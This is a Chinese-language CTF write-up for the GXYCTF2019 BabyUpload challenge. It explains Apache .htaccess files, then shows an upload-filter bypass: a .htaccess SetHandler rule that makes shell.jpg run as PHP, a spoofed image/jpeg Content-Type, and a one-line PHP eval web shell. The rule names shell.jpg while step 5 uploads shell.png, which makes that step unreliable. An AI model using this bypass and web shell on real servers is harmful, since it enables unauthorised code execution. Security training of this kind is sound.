[GXYCTF2019]BabyUpload

笔记：

.htaccess是什么

.htaccess文件(或者"分布式配置文件"）提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

启用.htaccess，需要修改httpd.conf，启用AllowOverride，并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名，可以用AccessFileName指令来改变。例如，需要使用.config ，则可以在服务器配置文件中按以下方法配置：AccessFileName .config 。

笼统地说，.htaccess可以帮我们实现包括：文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表，以及使用其他文件作为index文件等一些功能。

这里上传.htaccess文件是为了让它把jpg图片当php执行。

 

 

1.上传一个包含后门的shell.php文件，提示后缀不能包含ph，那.phtml文件也是不行的

2.考虑上传一个.htaccess文件，并把.php后缀修改为.jpg，让.htaccess文件把jpg文件当php执行。

文件语句为

 

 <FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch>

 

3.上传失败，就抓包

4.抓包后把Content-Type修改为image/jpeg，上传成功

5.再上传一个shell.png，内容为

<script language="php">eval($_POST['hhz'])</script>

同样修改Content-Type: image/jpeg，上传成功，然后用蚁剑连接，查看根目录，得到flag。